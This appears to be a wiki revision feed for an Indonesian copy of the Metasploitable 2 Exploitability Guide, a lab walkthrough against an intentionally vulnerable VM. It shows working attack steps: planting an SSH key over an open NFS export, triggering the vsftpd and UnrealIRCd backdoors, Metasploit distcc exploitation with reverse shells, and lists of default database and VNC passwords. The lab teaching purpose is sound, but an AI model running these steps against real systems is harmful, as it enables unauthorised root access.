&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;msfadmin&lt;/del&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;Selain itu&lt;/ins&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;user&lt;/del&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;* PostgreSQL&lt;/ins&gt;, username postgres password postgres&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt; &lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;* MySQL&lt;/ins&gt;, username root password &lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;kosong&lt;/ins&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;user&lt;/del&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;* &lt;/ins&gt;VNC remote desktop access&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;, &lt;/ins&gt;password password.&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt; &lt;/div&gt;&lt;/td&gt;&lt;td colspan=&quot;2&quot;&gt; &lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;postgres&lt;/del&gt;&lt;/div&gt;&lt;/td&gt;&lt;td colspan=&quot;2&quot;&gt; &lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt; &lt;/div&gt;&lt;/td&gt;&lt;td colspan=&quot;2&quot;&gt; &lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;postgres&lt;/del&gt;&lt;/div&gt;&lt;/td&gt;&lt;td colspan=&quot;2&quot;&gt; &lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt; &lt;/div&gt;&lt;/td&gt;&lt;td colspan=&quot;2&quot;&gt; &lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;sys&lt;/del&gt;&lt;/div&gt;&lt;/td&gt;&lt;td colspan=&quot;2&quot;&gt; &lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt; &lt;/div&gt;&lt;/td&gt;&lt;td colspan=&quot;2&quot;&gt; &lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;batman&lt;/del&gt;&lt;/div&gt;&lt;/td&gt;&lt;td colspan=&quot;2&quot;&gt; &lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt; &lt;/div&gt;&lt;/td&gt;&lt;td colspan=&quot;2&quot;&gt; &lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;klog&lt;/del&gt;&lt;/div&gt;&lt;/td&gt;&lt;td colspan=&quot;2&quot;&gt; &lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt; &lt;/div&gt;&lt;/td&gt;&lt;td colspan=&quot;2&quot;&gt; &lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;123456789&lt;/del&gt;&lt;/div&gt;&lt;/td&gt;&lt;td colspan=&quot;2&quot;&gt; &lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt; &lt;/div&gt;&lt;/td&gt;&lt;td colspan=&quot;2&quot;&gt; &lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;service&lt;/del&gt;&lt;/div&gt;&lt;/td&gt;&lt;td colspan=&quot;2&quot;&gt; &lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt; &lt;/div&gt;&lt;/td&gt;&lt;td colspan=&quot;2&quot;&gt; &lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;service&lt;/del&gt;&lt;/div&gt;&lt;/td&gt;&lt;td colspan=&quot;2&quot;&gt; &lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt; &lt;/div&gt;&lt;/td&gt;&lt;td colspan=&quot;2&quot;&gt; &lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;In addition to these system-level accounts&lt;/del&gt;, &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;the PostgreSQL service can be accessed with &lt;/del&gt;username postgres &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;and &lt;/del&gt;password postgres, &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;while the MySQL service is open to &lt;/del&gt;username root &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;with an empty &lt;/del&gt;password&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;. The &lt;/del&gt;VNC &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;service provides &lt;/del&gt;remote desktop access &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;using the &lt;/del&gt;password password.&lt;/div&gt;&lt;/td&gt;&lt;td colspan=&quot;2&quot;&gt; &lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;==Vulnerable Web Services==&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;==Vulnerable Web Services==&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;</summary>
		<author><name>Onnowpurbo</name></author>
	</entry>
	<entry>
		<id>https://onnocenter.or.id/wiki/index.php?title=Metasploitable:_Exploit_Guide&amp;diff=59670&amp;oldid=prev</id>
		<title>Onnowpurbo at 01:15, 6 February 2020</title>
		<link rel="alternate" type="text/html" href="https://onnocenter.or.id/wiki/index.php?title=Metasploitable:_Exploit_Guide&amp;diff=59670&amp;oldid=prev"/>
		<updated>2020-02-06T01:15:48Z</updated>

		<summary type="html">&lt;p&gt;&lt;/p&gt;
&lt;a href=&quot;https://onnocenter.or.id/wiki/index.php?title=Metasploitable:_Exploit_Guide&amp;amp;diff=59670&amp;amp;oldid=52846&quot;&gt;Show changes&lt;/a&gt;</summary>
		<author><name>Onnowpurbo</name></author>
	</entry>
	<entry>
		<id>https://onnocenter.or.id/wiki/index.php?title=Metasploitable:_Exploit_Guide&amp;diff=52846&amp;oldid=prev</id>
		<title>Onnowpurbo: Created page with &quot;sumber: https://metasploit.help.rapid7.com/docs/metasploitable-2-exploitability-guide   Metasploitable 2 Exploitability Guide  The Metasploitable virtual machine is an intenti...&quot;</title>
		<link rel="alternate" type="text/html" href="https://onnocenter.or.id/wiki/index.php?title=Metasploitable:_Exploit_Guide&amp;diff=52846&amp;oldid=prev"/>
		<updated>2018-11-29T09:03:06Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;sumber: https://metasploit.help.rapid7.com/docs/metasploitable-2-exploitability-guide   Metasploitable 2 Exploitability Guide  The Metasploitable virtual machine is an intenti...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;sumber: https://metasploit.help.rapid7.com/docs/metasploitable-2-exploitability-guide&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Metasploitable 2 Exploitability Guide&lt;br /&gt;
&lt;br /&gt;
The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. Version 2 of this virtual machine is available for download and ships with even more vulnerabilities than the original image. This virtual machine is compatible with VMWare, VirtualBox, and other common virtualization platforms. By default, Metasploitable's network interfaces are bound to the NAT and Host-only network adapters, and the image should never be exposed to a hostile network. (Note: A video tutorial on installing Metasploitable 2 is available here.)&lt;br /&gt;
&lt;br /&gt;
This document outlines many of the security flaws in the Metasploitable 2 image. Currently missing is documentation on the web server and web application flaws as well as vulnerabilities that allow a local user to escalate to root privileges. This document will continue to expand over time as many of the less obvious flaws with this platform are detailed.&lt;br /&gt;
Getting Started&lt;br /&gt;
&lt;br /&gt;
After the virtual machine boots, login to console with username msfadmin and password msfadmin. From the shell, run the ifconfig command to identify the IP address.&lt;br /&gt;
&lt;br /&gt;
msfadmin@metasploitable:~$ ifconfig&lt;br /&gt;
&lt;br /&gt;
eth0      Link encap:Ethernet  HWaddr 00:0c:29:9a:52:c1 &lt;br /&gt;
          inet addr:192.168.99.131  Bcast:192.168.99.255  Mask:255.255.255.0&lt;br /&gt;
          inet6 addr: fe80::20c:29ff:fe9a:52c1/64 Scope:Link&lt;br /&gt;
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1&lt;br /&gt;
&lt;br /&gt;
Services&lt;br /&gt;
&lt;br /&gt;
From our attack system (Linux, preferably something like Kali Linux), we will identify the open network services on this virtual machine using the Nmap Security Scanner. The following command line will scan all TCP ports on the Metasploitable 2 instance:&lt;br /&gt;
&lt;br /&gt;
root@ubuntu:~# nmap -p0-65535 192.168.99.131&lt;br /&gt;
&lt;br /&gt;
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-05-31 21:14 PDT&lt;br /&gt;
Nmap scan report for 192.168.99.131&lt;br /&gt;
Host is up (0.00028s latency).&lt;br /&gt;
Not shown: 65506 closed ports&lt;br /&gt;
PORT      STATE SERVICE&lt;br /&gt;
21/tcp    open  ftp&lt;br /&gt;
22/tcp    open  ssh&lt;br /&gt;
23/tcp    open  telnet&lt;br /&gt;
25/tcp    open  smtp&lt;br /&gt;
53/tcp    open  domain&lt;br /&gt;
80/tcp    open  http&lt;br /&gt;
111/tcp   open  rpcbind&lt;br /&gt;
139/tcp   open  netbios-ssn&lt;br /&gt;
445/tcp   open  microsoft-ds&lt;br /&gt;
512/tcp   open  exec&lt;br /&gt;
513/tcp   open  login&lt;br /&gt;
514/tcp   open  shell&lt;br /&gt;
1099/tcp  open  rmiregistry&lt;br /&gt;
1524/tcp  open  ingreslock&lt;br /&gt;
2049/tcp  open  nfs&lt;br /&gt;
2121/tcp  open  ccproxy-ftp&lt;br /&gt;
3306/tcp  open  mysql&lt;br /&gt;
3632/tcp  open  distccd&lt;br /&gt;
5432/tcp  open  postgresql&lt;br /&gt;
5900/tcp  open  vnc&lt;br /&gt;
6000/tcp  open  X11&lt;br /&gt;
6667/tcp  open  irc&lt;br /&gt;
6697/tcp  open  unknown&lt;br /&gt;
8009/tcp  open  ajp13&lt;br /&gt;
8180/tcp  open  unknown&lt;br /&gt;
8787/tcp  open  unknown&lt;br /&gt;
39292/tcp open  unknown&lt;br /&gt;
43729/tcp open  unknown&lt;br /&gt;
44813/tcp open  unknown&lt;br /&gt;
55852/tcp open  unknown&lt;br /&gt;
MAC Address: 00:0C:29:9A:52:C1 (VMware)&lt;br /&gt;
&lt;br /&gt;
Nearly every one of these listening services provides a remote entry point into the system. In the next section, we will walk through some of these vectors.&lt;br /&gt;
Unix Basics&lt;br /&gt;
&lt;br /&gt;
TCP ports 512, 513, and 514 are known as &amp;quot;r&amp;quot; services, and have been misconfigured to allow remote access from any host (a standard &amp;quot;.rhosts + +&amp;quot; situation). To take advantage of this, make sure the &amp;quot;rsh-client&amp;quot; client is installed (on Ubuntu), and run the following command as your local root user. If you are prompted for an SSH key, this means the rsh-client tools have not been installed and Ubuntu is defaulting to using SSH.&lt;br /&gt;
&lt;br /&gt;
# rlogin -l root 192.168.99.131&lt;br /&gt;
Last login: Fri Jun  1 00:10:39 EDT 2012 from :0.0 on pts/0&lt;br /&gt;
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686&lt;br /&gt;
&lt;br /&gt;
root@metasploitable:~#&lt;br /&gt;
&lt;br /&gt;
This is about as easy as it gets. The next service we should look at is the Network File System (NFS). NFS can be identified by probing port 2049 directly or asking the portmapper for a list of services. The example below using rpcinfo to identify NFS and showmount -e to determine that the &amp;quot;/&amp;quot; share (the root of the file system) is being exported. You will need the rpcbind and nfs-common Ubuntu packages to follow along.&lt;br /&gt;
&lt;br /&gt;
root@ubuntu:~# rpcinfo -p 192.168.99.131&lt;br /&gt;
   program vers proto   port  service&lt;br /&gt;
    100000    2   tcp    111  portmapper&lt;br /&gt;
    100000    2   udp    111  portmapper&lt;br /&gt;
    100024    1   udp  53318  status&lt;br /&gt;
    100024    1   tcp  43729  status&lt;br /&gt;
    100003    2   udp   2049  nfs&lt;br /&gt;
    100003    3   udp   2049  nfs&lt;br /&gt;
    100003    4   udp   2049  nfs&lt;br /&gt;
    100021    1   udp  46696  nlockmgr&lt;br /&gt;
    100021    3   udp  46696  nlockmgr&lt;br /&gt;
    100021    4   udp  46696  nlockmgr&lt;br /&gt;
    100003    2   tcp   2049  nfs&lt;br /&gt;
    100003    3   tcp   2049  nfs&lt;br /&gt;
    100003    4   tcp   2049  nfs&lt;br /&gt;
    100021    1   tcp  55852  nlockmgr&lt;br /&gt;
    100021    3   tcp  55852  nlockmgr&lt;br /&gt;
    100021    4   tcp  55852  nlockmgr&lt;br /&gt;
    100005    1   udp  34887  mountd&lt;br /&gt;
    100005    1   tcp  39292  mountd&lt;br /&gt;
    100005    2   udp  34887  mountd&lt;br /&gt;
    100005    2   tcp  39292  mountd&lt;br /&gt;
    100005    3   udp  34887  mountd&lt;br /&gt;
    100005    3   tcp  39292  mountd&lt;br /&gt;
&lt;br /&gt;
root@ubuntu:~# showmount -e 192.168.99.131&lt;br /&gt;
Export list for 192.168.99.131:&lt;br /&gt;
/ *&lt;br /&gt;
&lt;br /&gt;
Getting access to a system with a writeable filesystem like this is trivial. To do so (and because SSH is running), we will generate a new SSH key on our attacking system, mount the NFS export, and add our key to the root user account's authorized_keys file:&lt;br /&gt;
&lt;br /&gt;
root@ubuntu:~# ssh-keygen&lt;br /&gt;
Generating public/private rsa key pair.&lt;br /&gt;
Enter file in which to save the key (/root/.ssh/id_rsa):&lt;br /&gt;
Enter passphrase (empty for no passphrase):&lt;br /&gt;
Enter same passphrase again:&lt;br /&gt;
Your identification has been saved in /root/.ssh/id_rsa.&lt;br /&gt;
Your public key has been saved in /root/.ssh/id_rsa.pub.&lt;br /&gt;
&lt;br /&gt;
root@ubuntu:~# mkdir /tmp/r00t&lt;br /&gt;
root@ubuntu:~# mount -t nfs 192.168.99.131:/ /tmp/r00t/&lt;br /&gt;
root@ubuntu:~# cat ~/.ssh/id_rsa.pub &amp;gt;&amp;gt; /tmp/r00t/root/.ssh/authorized_keys&lt;br /&gt;
root@ubuntu:~# umount /tmp/r00t&lt;br /&gt;
&lt;br /&gt;
root@ubuntu:~# ssh root@192.168.99.131&lt;br /&gt;
Last login: Fri Jun  1 00:29:33 2012 from 192.168.99.128&lt;br /&gt;
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686&lt;br /&gt;
&lt;br /&gt;
root@metasploitable:~#&lt;br /&gt;
&lt;br /&gt;
Backdoors&lt;br /&gt;
&lt;br /&gt;
On port 21, Metasploitable2 runs vsftpd, a popular FTP server. This particular version contains a backdoor that was slipped into the source code by an unknown intruder. The backdoor was quickly identified and removed, but not before quite a few people downloaded it. If a username is sent that ends in the sequence :) [ a happy face ], the backdoored version will open a listening shell on port 6200. We can demonstrate this with telnet or use the Metasploit Framework module to automatically exploit it:&lt;br /&gt;
&lt;br /&gt;
root@ubuntu:~# telnet 192.168.99.131 21&lt;br /&gt;
Trying 192.168.99.131...&lt;br /&gt;
Connected to 192.168.99.131.&lt;br /&gt;
Escape character is '^]'.&lt;br /&gt;
220 (vsFTPd 2.3.4)&lt;br /&gt;
user backdoored:)&lt;br /&gt;
331 Please specify the password.&lt;br /&gt;
pass invalid&lt;br /&gt;
^]&lt;br /&gt;
telnet&amp;gt; quit&lt;br /&gt;
Connection closed.&lt;br /&gt;
&lt;br /&gt;
root@ubuntu:~# telnet 192.168.99.131 6200&lt;br /&gt;
Trying 192.168.99.131...&lt;br /&gt;
Connected to 192.168.99.131.&lt;br /&gt;
Escape character is '^]'.&lt;br /&gt;
id;&lt;br /&gt;
uid=0(root) gid=0(root)&lt;br /&gt;
&lt;br /&gt;
On port 6667, Metasploitable2 runs the UnreaIRCD IRC daemon. This version contains a backdoor that went unnoticed for months - triggered by sending the letters &amp;quot;AB&amp;quot; following by a system command to the server on any listening port. Metasploit has a module to exploit this in order to gain an interactive shell, as shown below.&lt;br /&gt;
&lt;br /&gt;
msfconsole&lt;br /&gt;
&lt;br /&gt;
msf &amp;gt; use exploit/unix/irc/unreal_ircd_3281_backdoor&lt;br /&gt;
msf  exploit(unreal_ircd_3281_backdoor) &amp;gt; set RHOST 192.168.99.131&lt;br /&gt;
msf  exploit(unreal_ircd_3281_backdoor) &amp;gt; exploit&lt;br /&gt;
&lt;br /&gt;
[*] Started reverse double handler&lt;br /&gt;
[*] Connected to 192.168.99.131:6667...&lt;br /&gt;
    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...&lt;br /&gt;
    :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead&lt;br /&gt;
[*] Sending backdoor command...&lt;br /&gt;
[*] Accepted the first client connection...&lt;br /&gt;
[*] Accepted the second client connection...&lt;br /&gt;
[*] Command: echo 8bMUYsfmGvOLHBxe;&lt;br /&gt;
[*] Writing to socket A&lt;br /&gt;
[*] Writing to socket B&lt;br /&gt;
[*] Reading from sockets...&lt;br /&gt;
[*] Reading from socket B&lt;br /&gt;
[*] B: &amp;quot;8bMUYsfmGvOLHBxe\r\n&amp;quot;&lt;br /&gt;
[*] Matching...&lt;br /&gt;
[*] A is input...&lt;br /&gt;
[*] Command shell session 1 opened (192.168.99.128:4444 -&amp;gt; 192.168.99.131:60257) at 2012-05-31 21:53:59 -0700&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
id&lt;br /&gt;
uid=0(root) gid=0(root)&lt;br /&gt;
&lt;br /&gt;
Much less subtle is the old standby &amp;quot;ingreslock&amp;quot; backdoor that is listening on port 1524. The ingreslock port was a popular choice a decade ago for adding a backdoor to a compromised server. Accessing it is easy:&lt;br /&gt;
&lt;br /&gt;
root@ubuntu:~# telnet 192.168.99.131 1524&lt;br /&gt;
Trying 192.168.99.131...&lt;br /&gt;
Connected to 192.168.99.131.&lt;br /&gt;
Escape character is '^]'.&lt;br /&gt;
root@metasploitable:/# id&lt;br /&gt;
uid=0(root) gid=0(root) groups=0(root)&lt;br /&gt;
&lt;br /&gt;
Unintentional Backdoors&lt;br /&gt;
&lt;br /&gt;
In addition to the malicious backdoors in the previous section, some services are almost backdoors by their very nature. The first of which installed on Metasploitable2 is distccd. This program makes it easy to scale large compiler jobs across a farm of like-configured systems. The problem with this service is that an attacker can easily abuse it to run a command of their choice, as demonstrated by the Metasploit module usage below.&lt;br /&gt;
&lt;br /&gt;
msfconsole&lt;br /&gt;
&lt;br /&gt;
msf &amp;gt; use exploit/unix/misc/distcc_exec&lt;br /&gt;
msf  exploit(distcc_exec) &amp;gt; set RHOST 192.168.99.131&lt;br /&gt;
msf  exploit(distcc_exec) &amp;gt; exploit&lt;br /&gt;
&lt;br /&gt;
[*] Started reverse double handler&lt;br /&gt;
[*] Accepted the first client connection...&lt;br /&gt;
[*] Accepted the second client connection...&lt;br /&gt;
[*] Command: echo uk3UdiwLUq0LX3Bi;&lt;br /&gt;
[*] Writing to socket A&lt;br /&gt;
[*] Writing to socket B&lt;br /&gt;
[*] Reading from sockets...&lt;br /&gt;
[*] Reading from socket B&lt;br /&gt;
[*] B: &amp;quot;uk3UdiwLUq0LX3Bi\r\n&amp;quot;&lt;br /&gt;
[*] Matching...&lt;br /&gt;
[*] A is input...&lt;br /&gt;
[*] Command shell session 1 opened (192.168.99.128:4444 -&amp;gt; 192.168.99.131:38897) at 2012-05-31 22:06:03 -0700&lt;br /&gt;
&lt;br /&gt;
id&lt;br /&gt;
uid=1(daemon) gid=1(daemon) groups=1(daemon)&lt;br /&gt;
&lt;br /&gt;
